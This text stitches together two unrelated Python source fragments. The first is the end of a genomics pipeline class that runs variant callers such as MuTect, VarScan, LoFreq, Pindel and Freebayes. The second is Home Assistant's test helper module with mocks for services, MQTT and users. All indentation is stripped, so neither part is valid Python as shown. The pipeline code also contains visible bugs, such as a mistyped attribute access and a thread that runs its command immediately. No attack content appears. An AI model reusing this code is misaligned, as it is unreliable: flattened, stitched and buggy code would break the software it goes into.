t.setDaemon(True)
t.start()
for t in threads:
t.join()
if not out_case_vcf.isexist() or not out_control_vcf.isexist():
return(False)
out_case_vcf.control_filter(out_control_vcf.path, out_vcf.path)
if not out_vcf.isexist():
return(False)
else:
savecmd(case_cmd, self.samplename)
savecmd(control_cmd, self.samplename)
out_case_vcf.control_filter(out_control_vcf.path, out_vcf.path)
if not out_vcf.isexist():
return(False)
return(out_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct unifiedgenotyper_caller step!")
return(False)
else:
info("Running Unifiedgenotyper_caller step for " + self.path)
cmd = setcmd(self.path, out_vcf.path)
log = " &> %s/log/%s.case.Unifiedgenotyper_caller.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if self.isexist():
if not out_vcf.isexist():
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_vcf.isexist():
return(False)
else:
savecmd(cmd, self.samplename)
return(out_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct unifiedgenotyper_caller step!")
return(False)
def mutect_caller(self, control_bam ,out_dir):
"""
Ret:Use GATK Mutect to conduct Variant Discovery Step.
"""
config_dict = copy.deepcopy(self.config_dict)
config_dict = set_jdk(config_dict, "jdk_17")
java = config_dict["java"]
reffa = config_dict["reffa"]
dbsnp = config_dict["dbsnp"]
cosmic = config_dict["cosmic"]
intervals = config_dict["intervals"]
tmp_dir = config_dict["gatk_tmp_dir"]
mutect = config_dict["mutect"]
extra_option = config_dict["bamfile_mutect_caller_extra"]
create_dir(out_dir)
info("Running Mutect step for " + self.path and control_bam)
snp_flag = dbsnp != ""
intervals_flag = intervals != ""
out_vcf = out_dir + "/" + self.samplename + ".vcf"
tmp = out_vcf + ".tmp"
out_vcf = VcfFile(out_vcf,self.samplename, config_dict)
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
if isexist(tmp) and not out_vcf.isexist():
runcmd("grep -v \'REJECT\' %s > %s" % (tmp, out_vcf.path))
cmd = "%s -jar %s -T MuTect -R %s -I:tumor %s -I:normal %s \
--cosmic %s \
%s \
-o %s "\
% (java, mutect, reffa, self.path, control_bam, cosmic, extra_option, tmp)
if self.isexist():
if not out_vcf.isexist() and not isexist(tmp):
if snp_flag and intervals_flag :
cmd = cmd + " --dbsnp %s --intervals %s" %(dbsnp,intervals)
elif snp_flag and not intervals_flag:
cmd = cmd + " --dbsnp %s" %(dbsnp)
elif not snp_flag and intervals_flag:
cmd = cmd + " --intervals %s" %(intervals)
log = " &> %s/log/%s.case.Mutect_caller.log" % (os.getcwd(), self.runid)
cmd = cmd + log
cmd = cmd + " && grep -v \'REJECT\' %s > %s" % (tmp, out_vcf.path)
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_vcf.isexist():
return(False)
else:
savecmd(cmd, self.samplename)
config_dict = set_jdk(config_dict, "jdk_18")
return(out_vcf) # VcfFile Class instance
else:
config_dict = set_jdk(config_dict, "jdk_18")
info("Bam File not exists, can not conduct mutect_caller step!")
return(False)
def varscan_caller(self, out_dir="", control_bam = ""):
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
varscan = config_dict["varscan"]
samtools = config_dict["samtools"]
reffa = config_dict["reffa"]
dbsnp = config_dict["dbsnp"]
java_max_mem = config_dict["java_max_mem"]
extra_option_somatic = config_dict["bamfile_varscan_caller_extra_somatic"]
extra_option_germline = config_dict["bamfile_varscan_caller_extra_germline"]
create_dir(out_dir)
info("Running Varscan_caller step for " + self.path)
out_snp_vcf = out_dir + "/" + self.samplename + ".snp.vcf"
out_snp_vcf = VcfFile(out_snp_vcf, self.samplename, config_dict, runid = self.runid + ".Varscan")
out_indel_vcf = out_dir + "/" + self.samplename + ".indel.vcf"
out_indel_vcf = VcfFile(out_indel_vcf, self.samplename, config_dict, runid = self.runid + ".Varscan")
out_vcf = out_dir + "/" + self.samplename + ".vcf"
out_vcf = VcfFile(out_vcf, self.samplename, config_dict)
case_bam = BamFile(self.path, self.samplename, config_dict)
control_bam = BamFile(control_bam, self.samplename, config_dict)
cmd = ""
if self.isexist():
if not out_vcf.isexist() and (not out_snp_vcf.isexist() or not out_indel_vcf.isexist()):
case_mpileup_fn = MpileupFile(out_dir + "/" + self.samplename + ".mpileup.case", self.samplename, config_dict)
control_mpileup_fn = MpileupFile(out_dir + "/" + self.samplename + ".mpileup.control", self.samplename, config_dict)
threads = []
if control_bam.path != "" and control_bam.isexist():
def func(case_bam = case_bam, case_mpileup_fn = case_mpileup_fn):
case_bam.mpileup(case_mpileup_fn.path)
t1 = threading.Thread(target = func)
def func(control_bam = control_bam, control_mpileup_fn = control_mpileup_fn):
control_bam.mpileup(control_mpileup_fn.path)
t2 = threading.Thread(target = func)
threads.append(t1)
threads.append(t2)
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
cmd = "%s -Xmx%s -jar %s somatic %s %s --output-snp %s --output-indel %s --output-vcf %s"\
%(java, java_max_mem, varscan, case_mpileup_fn.path, control_mpileup_fn.path, out_snp_vcf.path, out_indel_vcf.path, extra_option_somatic)
log = " &> %s/log/%s.case.Varscan_caller.log" % (os.getcwd(), self.runid)
cmd = cmd + log
runcmd(cmd)
savecmd(cmd, self.samplename)
else:
case_bam.mpileup(case_mpileup_fn.path)
snpcmd = "%s -Xmx%s -jar %s mpileup2snp %s --output-vcf 1 %s > %s"\
%(java, java_max_mem, varscan, case_mpileup_fn.path, extra_option_germline, out_snp_vcf.path)
indelcmd = "%s -Xmx%s -jar %s mpileup2indel %s --output-vcf 1 %s > %s"\
%(java, java_max_mem, varscan, case_mpileup_fn.path, extra_option_germline, out_indel_vcf.path)
snpcmd = snpcmd + " 2> %s/log/%s.case.Varscan_caller_snp.log" % (os.getcwd(), self.runid)
indelcmd = indelcmd + " 2> %s/log/%s.case.Varscan_caller_indel.log" % (os.getcwd(), self.runid)
t1 = threading.Thread(target = runcmd(snpcmd))
t2 = threading.Thread(target = runcmd(indelcmd))
threads.append(t1)
threads.append(t2)
savecmd(snpcmd, self.samplename)
savecmd(indelcmd, self.samplename)
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
if not out_snp_vcf.isexist() or not out_indel_vcf.isexist():
return(False)
else:
out_snp_vcf.varscan2gatkfmt()
out_indel_vcf.varscan2gatkfmt()
out_snp_vcf.merge(out_vcf.path, indel=out_indel_vcf.path)
else:
savecmd(cmd, self.samplename)
out_snp_vcf.varscan2gatkfmt()
out_indel_vcf.varscan2gatkfmt()
out_snp_vcf.merge(out_vcf.path, indel=out_indel_vcf.path)
return(out_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct varscan_caller step!")
return(False)
def torrent_caller(self, out_dir, control_bam=""):
"""
Ret:Use TVC-5.0.3 to conduct Variant Discovery Step.
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
tvc = config_dict["tvc"]
reffa = config_dict["reffa"]
dbsnp = config_dict["dbsnp"]
intervals = config_dict["intervals"]
tmp_dir = config_dict["tvc_tmp_dir"]
thread = config_dict["bamfile_torrent_caller_thread"]
extra_option = config_dict["bamfile_torrent_caller_extra"]
json = config_dict["tvc_params_json"]
create_dir(out_dir)
runed_vcf = out_dir + "/" + self.samplename + ".vcf"
runed_vcf = VcfFile(runed_vcf,self.samplename. config_dict)
def setcmd(bamfile, reffa, out_dir, json ="", backrun=False):
cmd = "%s -i %s -r %s -o %s %s " \
% (tvc, bamfile, reffa, out_dir, extra_option)
if json != "":
cmd = cmd + " -p %s" %(json)
if backrun:
cmd = cmd + " &"
return(cmd)
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
if control_bam != "" and isexist(control_bam):
info("Running TorrentVariantCaller step for " + self.path + " and " + control_bam)
out_case_vcf = VcfFile(out_dir + "/case/TSVC_variants.vcf", self.samplename, config_dict)
out_control_vcf = VcfFile(out_dir + "/control/TSVC_variants.vcf" ,self.samplename, config_dict)
case_cmd = setcmd(self.path, reffa, out_case_vcf.dirname, json)
case_cmd = case_cmd + " &> %s/log/%s.case.torrent_caller.log" % (os.getcwd(), self.runid)
control_cmd = setcmd(control_bam, reffa, out_control_vcf.dirname, json)
control_cmd = control_cmd + " &> %s/log/%s.control.torrent_caller.log" % (os.getcwd(), self.runid)
if self.isexist() and isexist(control_bam):
if not runed_vcf.isexist():
if not out_case_vcf.isexist():
runcmd(case_cmd)
savecmd(case_cmd, self.samplename)
if not out_control_vcf.isexist():
runcmd(control_cmd)
savecmd(control_cmd, self.samplename)
if not out_case_vcf.isexist() or not out_control_vcf.isexist():
return(False)
out_case_vcf.control_filter(out_control_vcf.path, runed_vcf.path)
if not runed_vcf.isexist():
return(False)
else:
savecmd(case_cmd, self.samplename)
savecmd(control_cmd, self.samplename)
out_case_vcf.control_filter(out_control_vcf.path, runed_vcf.path)
if not runed_vcf.isexist():
return(False)
return(runed_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct TorrentVariantCaller step!")
return(False)
else:
info("Running TorrentVariantCaller step for " + self.path)
out_vcf= out_dir + "/TSVC_variants.vcf"
out_vcf = VcfFile(out_vcf, self.samplename, config_dict)
cmd = setcmd(self.path, reffa, out_dir, json)
if out_vcf.isexist():
out_vcf.mv(runed_vcf.path)
if self.isexist():
if not runed_vcf.isexist():
runcmd(cmd)
savecmd(cmd, self.samplename)
if out_vcf.isexist():
if not out_vcf.mv(runed_vcf.path):
return(False)
else:
return(False)
else:
savecmd(cmd, self.samplename)
return(runed_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct TorrentVariantCaller step!")
return(False)
def lofreq_caller(self, out_dir, control_bam = ""):
"""
Ret:Use lofreq to conduct Variant Discovery Step.
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
lofreq = config_dict["lofreq"]
reffa = config_dict["reffa"]
dbsnp = config_dict["lofreq_dbsnp"]
intervals = config_dict["intervals"]
thread = config_dict["bamfile_lofreq_caller_thread"]
extra_option_germline = config_dict["bamfile_lofreq_caller_extra_germline"]
extra_option_somatic = config_dict["bamfile_lofreq_caller_extra_somatic"]
create_dir(out_dir)
info("Running Lofreq_caller step for " + self.path)
out_fn = out_dir + "/" + self.samplename + "_"
out_snp_vcf = out_dir + "/" + self.samplename + "_somatic_final.snvs.vcf"
out_indel_vcf = out_dir + "/" + self.samplename + "_somatic_final.indels.vcf"
runed_vcf = out_dir + "/" + self.samplename + ".vcf"
runed_vcf = VcfFile(runed_vcf,self.samplename, config_dict)
out_snp_vcf = VcfFile(out_snp_vcf, self.samplename, config_dict, runid = self.runid + ".Lofreq")
out_indel_vcf = VcfFile(out_indel_vcf, self.samplename, config_dict, runid = self.runid + ".Lofreq")
out_snp_vcfgz = FundementalFile(out_snp_vcf.path + ".gz")
out_indel_vcfgz = FundementalFile(out_indel_vcf.path + ".gz")
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
if control_bam != "" and isexist(control_bam):
cmd = "%s somatic -n %s -t %s -f %s -d %s --threads %s --call-indels -o %s %s " \
% (lofreq, control_bam, self.path, reffa, dbsnp, thread, out_fn, extra_option_somatic)
if intervals != "" and isexist(intervals):
cmd = cmd + " -l %s"%(intervals)
else:
cmd = "%s call-parallel --pp-threads %s -f %s --call-indels -o %s %s " %(lofreq, thread, reffa, runed_vcf, extra_option_germline)
if intervals != "" and isexist(intervals):
cmd = cmd + " -l %s %s"%(intervals, self.path)
else:
cmd = cmd + self.path
cmd = cmd + " &> %s/log/%s.case.lofreq_caller.log" % (os.getcwd(), self.runid)
if self.isexist():
if control_bam == "" or (not isexist(control_bam)):
runcmd(cmd)
savecmd(cmd, self.samplename)
else:
if out_snp_vcfgz.isexist() and not out_snp_vcf.isexist():
out_snp_vcfgz.gzip_uncompress()
if out_indel_vcfgz.isexist() and not out_indel_vcf.isexist():
out_indel_vcfgz.gzip_uncompress()
if not runed_vcf.isexist() and out_snp_vcf.isexist() and out_indel_vcf.isexist():
out_snp_vcf.merge(runed_vcf, indelvcf = out_indel_vcf.path)
if not runed_vcf.isexist():
runcmd(cmd)
savecmd(cmd, self.samplename)
out_snp_vcfgz.gzip_uncompress()
out_indel_vcfgz.gzip_uncompress()
out_snp_vcf.merge(runed_vcf, indelvcf = out_indel_vcf.path)
if runed_vcf.isexist():
return(runed_vcf)
else:
return(False)
else:
info("Bam File not exists, can not conduct lofreq_caller step!")
return(False)
def pindel_caller(self, out_dir, control_bam=""):
"""
Ret:Use Pindel to conduct SVs Discovery Step.
"""
config_dict = self.config_dict
reffa = config_dict["reffa"]
pindel_dir = config_dict["pindel_dir"]
thread = config_dict["bamfile_pindel_caller_thread"]
genome_name = config_dict["bamfile_pindel_genome_name"]
genome_date = config_dict["bamfile_pindel_genome_date"]
insertsize = config_dict["bamfile_pindel_insertsize"]
create_dir(out_dir)
pindel = pindel_dir + "/pindel"
pindel2vcf4tcga = pindel_dir + "/pindel2vcf4tcga"
def __pindelout2vcf(datadir, prefix, out_vcf):
out_type_list = ["_D","_BP","_SI","_INV","_TD","_LI","_BP"]
out_fnlist = [ prefix + i for i in out_type_list]
fn = FundementalFile("/dev/null")
if not isexist(out_vcf + ".pindelout"):
fn.catmerge(out_fnlist, out_vcf + ".pindelout")
cmd = "%s -p %s -r %s -R %s -d %s -v %s -G -so true" \
%(pindel2vcf4tcga, out_vcf + ".pindelout", reffa, genome_name, genome_date, out_vcf)
if not isexist(out_vcf):
runcmd(cmd)
savecmd(cmd, self.samplename)
info("Running Pindel step for " + self.path)
runed_vcf = VcfFile(out_dir + "/" + self.samplename + ".vcf", self.samplename, config_dict)
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
config_case = out_dir + "/pindel.case.config"
config_casefn = open(config_case,"w")
config_casefn.write(self.path + "\t" + insertsize + "\t" + self.samplename + "\n")
config_casefn.flush()
out_case = out_dir + "/" + self.samplename + ".case"
config_control = out_dir + "/pindel.control.config"
config_controlfn = open(config_control,"w")
config_controlfn.write(control_bam + "\t" + insertsize + "\t" + self.samplename + "\n")
config_controlfn.flush()
out_control = out_dir + "/" + self.samplename + ".control"
if self.isexist():
case_cmd = "%s -f %s -i %s -c ALL --number_of_threads %s -o %s" %(pindel, reffa, config_case, thread, out_case)
case_cmd = case_cmd + " &> %s/log/%s.case.pindel_caller.log" % (os.getcwd(), self.runid)
control_cmd = "%s -f %s -i %s -c ALL --number_of_threads %s -o %s" %(pindel, reffa, config_control, thread, out_control)
control_cmd = control_cmd + " &> %s/log/%s.control.pindel_caller.log" % (os.getcwd(), self.runid)
else:
out_case = out_dir + "/" + self.samplename + ".case"
case_cmd = "%s -f %s -i %s -c ALL --number_of_threads %s -o %s" %(pindel, reffa, config_case, thread, out_case)
case_cmd = case_cmd + " &> %s/log/%s.case.pindel_caller.log" % (os.getcwd(), self.runid)
if self.isexist():
if control_bam != "" and isexist(control_bam):
if not isexist(out_case + "_D"):
runcmd(case_cmd)
savecmd(case_cmd, self.samplename)
if not isexist(out_control + "_D"):
runcmd(control_cmd)
savecmd(control_cmd, self.samplename)
out_case_vcf = VcfFile(out_case + ".vcf", self.samplename, config_dict)
out_control_vcf = VcfFile(out_control + ".vcf", self.samplename, config_dict)
__pindelout2vcf(out_dir, out_case, out_case_vcf.path)
__pindelout2vcf(out_dir, out_control, out_control_vcf.path)
out_case_vcf.control_filter(out_control_vcf.path, runed_vcf.path)
else:
if not isexist(out_case + "_D"):
runcmd(case_cmd)
savecmd(case_cmd, self.samplename)
out_case_vcf = VcfFile(out_case + ".vcf", self.samplename, config_dict)
__pindelout2vcf(out_dir, out_case, out_case_vcf.path)
out_case_vcf.mv(runed_vcf.path)
if runed_vcf.isexist():
return(runed_vcf)
else:
return(False)
info("Pindel VariantCaller run fail!")
else:
info("Bam File not exists, can not conduct Pindel step!")
return(False)
def freebayes_caller(self, out_dir, control_bam=""):
"""
Ret:Use Freebayes to conduct Variant Discovery Step.
"""
config_dict = self.config_dict
java = config_dict["java"]
freebayes = config_dict["freebayes"]
reffa = config_dict["reffa"]
intervals = config_dict["intervals"]
extra_option = config_dict["bamfile_freebayes_caller_extra"]
create_dir(out_dir)
def setcmd(bamfile, out_vcf, backrun=False):
cmd = "%s -f %s %s" \
% (freebayes, reffa, extra_option)
if intervals_flag:
cmd = cmd + " -t %s" %(intervals)
if backrun:
cmd = cmd + " &"
cmd = cmd + bamfile + " > " + out_vcf
return(cmd)
intervals_flag = intervals != ""
out_vcf = out_dir + "/" + self.samplename + ".vcf"
out_vcf = VcfFile(out_vcf, self.samplename, config_dict)
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
if control_bam != "" and isexist(control_bam):
info("Running frebayes_caller step for " + self.path + " and " + control_bam)
out_case_vcf = VcfFile(out_vcf.path + ".case", self.samplename, config_dict)
out_control_vcf = VcfFile(out_vcf.path + ".control" ,self.samplename, config_dict)
case_cmd = setcmd(self.path, out_case_vcf.path)
control_cmd = setcmd(control_bam, out_control_vcf.path)
if self.isexist() and isexist(control_bam):
if not out_vcf.isexist():
threads = []
if not out_case_vcf.isexist():
def func(cmd = case_cmd):
runcmd(cmd)
t1 = threading.Thread(target = func)
threads.append(t1)
savecmd(case_cmd, self.samplename)
if not out_control_vcf.isexist():
def func(cmd = control_cmd):
runcmd(cmd)
t2 = threading.Thread(target = func)
threads.append(t2)
savecmd(control_cmd, self.samplename)
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
if not out_case_vcf.isexist() or not out_control_vcf.isexist():
return(False)
out_case_vcf.control_filter(out_control_vcf.path, out_vcf.path)
if not out_vcf.isexist():
return(False)
else:
savecmd(case_cmd, self.samplename)
savecmd(control_cmd, self.samplename)
out_case_vcf.control_filter(out_control_vcf.path, out_vcf.path)
if not out_vcf.isexist():
return(False)
return(out_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct unifiedgenotyper_caller step!")
return(False)
else:
info("Running freebayes_caller step for " + self.path)
cmd = setcmd(self.path, out_vcf.path)
if self.isexist():
if not out_vcf.isexist():
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_vcf.isexist():
return(False)
else:
savecmd(cmd, self.samplename)
return(out_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct freebayes_caller step!")
def __str__(self):
return(self.path)
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
from collections import OrderedDict
from datetime import timedelta
import functools as ft
import json
import os
import sys
from unittest.mock import patch, MagicMock, Mock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from homeassistant import auth, core as ha, config_entries
from homeassistant.auth import (
models as auth_models, auth_store, providers as auth_providers)
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.config import async_process_component_config
from homeassistant.helpers import (
intent, entity, restore_state, entity_registry,
entity_platform, storage, device_registry)
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT, EVENT_HOMEASSISTANT_CLOSE)
from homeassistant.components import mqtt, recorder
from homeassistant.util.async_ import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = 'https://example.com/app'
CLIENT_REDIRECT_URI = 'https://example.com/app/callback'
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
hass.config.async_load = Mock()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock):
return mock_coro()
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
@asyncio.coroutine
def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
yield from orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(
domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode('utf-8')
msg = mqtt.Message(topic, payload, qos, retain)
hass.async_run_job(hass.data['mqtt']._mqtt_on_message, None, None, msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': time})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path, encoding='utf-8') as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@asyncio.coroutine
def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: 'mock-broker'}
with patch('paho.mqtt.client.Client') as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = yield from async_setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: config
})
assert result
hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
wraps=hass.data['mqtt'])
return hass.data['mqtt']
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
async def _get_reg():
return registry
hass.data[entity_registry.DATA_REGISTRY] = \
hass.loop.create_task(_get_reg())
return registry
def mock_device_registry(hass, mock_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
async def _get_reg():
return registry
hass.data[device_registry.DATA_REGISTRY] = \
hass.loop.create_task(_get_reg())
return registry
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(self, id=None, is_owner=False, is_active=True,
name='Mock User', system_generated=False):
"""Initialize mock user."""
kwargs = {
'is_owner': is_owner,
'is_active': is_active,
'name': name,
'system_generated': system_generated,
}
if id is not None:
kwargs['id'] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config)
assert provider is not None, 'Invalid config specified'
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError('Provider already registered')
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._users = OrderedDict()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
async_setup=None, async_setup_entry=None,
async_unload_entry=None):
"""Initialize the mock module."""
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
class MockPlatform:
"""Provide a fake platform."""
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None, async_setup_platform=None,
async_setup_entry=None, scan_interval=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self, hass,
logger=None,
domain='test_domain',
platform_name='test_platform',
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
async_entities_added_callback=lambda: None
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger('homeassistant.helpers.entity_platform')
# Otherwise the constructor will blow up.
if (isinstance(platform, Mock) and
isinstance(platform.PARALLEL_UPDATES, Mock)):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleDevice(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
